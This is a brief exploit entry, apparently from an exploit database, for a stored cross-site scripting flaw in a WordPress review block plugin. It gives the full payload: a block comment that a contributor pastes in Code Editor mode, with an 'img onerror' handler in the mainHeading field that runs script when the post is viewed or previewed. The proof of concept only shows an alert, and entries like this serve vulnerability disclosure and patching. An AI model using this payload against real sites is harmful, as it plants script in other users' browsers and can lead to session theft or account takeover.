## https://sploitus.com/exploit?id=WPEX-ID:5014F886-020E-49D1-96A5-2159EED8BA14
As a contributor, put the following payload in a post while in Code Editor mode
<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->
The XSS will be triggered when viewing/prevewing the post